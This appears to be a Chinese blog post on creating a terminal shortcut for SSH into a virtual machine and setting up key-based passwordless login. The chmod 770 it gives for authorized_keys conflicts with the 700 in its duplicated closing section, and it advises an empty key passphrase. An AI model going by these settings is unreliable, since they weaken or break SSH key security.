<p><img src= "https://img-blog.csdnimg.cn/322b3e519c8b4a128c24bed4da2c492b.png" alt="[外链图片转存失败,源站可能有防盗链机制,建议将图片保存失败,源站可能有防盗下来851229742)(C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220610164418979.png)]"></p>
<p><img src= "/img/a4fbb966a75d4c8cb76f39f6ad5a6247.png" alt="在这里插入图片描述"></p>
<h2 id="终端快捷-ssh"><a href="#终端快捷-ssh" class="headerlink" title="终端快捷 ssh"></a>终端快捷 ssh</h2><p>复制<code>&#39;s</code>前面的<br>打开终端设置<br><img src= "/img/9fafbf4213e44ca2ac1c80a1262d9750.png" alt="在这里插入图片描述"></p>
<p>左侧添加新配置文件-&gt;添加新控制文件</p>
<p>然后填写第二行即命令行</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">ssh 虚拟机登录用户名@虚拟机IP</span><br></pre></td></tr></table></figure>

<p>其实就是 ssh 上面复制的</p>
<p>保存</p>
<p><img src= "/img/8240fecdcacd49d6b15ccca9c3debe88.png"></p>
<p>即可在物理机终端快速打开</p>
<p><img src= "/img/2314c349c1964a2d8ecf9520e7a294dd.png" alt="在这里插入图片描述"></p>
<h2 id="免密-ssh-登录"><a href="#免密-ssh-登录" class="headerlink" title="免密 ssh 登录"></a>免密 ssh 登录</h2><p>在物理机运行：</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">ssh-keygen</span><br></pre></td></tr></table></figure>

<p>后面第一个路径回车</p>
<p>后面密码直接回车（即可实现免密码登录）</p>
<p><img src= "/img/754f8f550c2345c6a47fe8bb7c4dee29.png" alt="请添加图片描述"></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">Your identification has been saved in C:\Users\      /.ssh/id_rsa.</span><br><span class="line">Your public key has been saved in C:\Users\            /.ssh/id_rsa.pub.</span><br><span class="line">The key fingerprint is:</span><br><span class="line">SHA256:ln6ZkrhHWH*********tRbGBeooF4g       \    @</span><br><span class="line">The key&#x27;s randomart image is:</span><br><span class="line">+---[RSA 3072]----+</span><br><span class="line">|      .o.*.+     |</span><br><span class="line">|..   o..+ * .    |</span><br><span class="line">|***********.     |</span><br><span class="line">|   *.o.o+.o      |</span><br><span class="line">|. = +.o*S  .     |</span><br><span class="line">| *********       |</span><br><span class="line">+----[SHA256]-----+</span><br></pre></td></tr></table></figure>

<p>找到第一行的那个目录，把 id_rsa.pub 文件复制到虚拟机</p>
<p>执行</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">cat id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys</span><br><span class="line">chmod 770 ~/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<blockquote>
<p>报未找到.ssh 的话</p>
<p>要先运行<code>ssh-keygen</code>和在物理机设置一样</p>
</blockquote>
<p>然后终端打开虚拟机就不用输密码了</p>
<h2 id="报错情况"><a href="#报错情况" class="headerlink" title="报错情况"></a>报错情况</h2><h3 id="仍需密码："><a href="#仍需密码：" class="headerlink" title="仍需密码："></a>仍需密码：</h3><p>传到虚拟机的 keygen 一定要是公钥 pub</p>
<h3 id="连接超时"><a href="#连接超时" class="headerlink" title="连接超时"></a>连接超时</h3><p>过一段时间之后 连不上<br>是 ip 未固定<br>需将虚拟机 ip 固定<br>桥接和 net 模式固定 IP 方式会抽空发<br>到时候在这打个传送</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">cat id_rsa.pub &gt;&gt; ~/.ssh/authorized_keys</span><br><span class="line">chmod 700 ~/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<blockquote>
<p>报未找到.ssh 的话</p>
<p>要先运行<code>ssh-keygen</code>和在物理机设置一样</p>
</blockquote>
<p>然后终端打开虚拟机就不用输密码了</p>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>ssh</tag>
      </tags>
  </entry>
</search>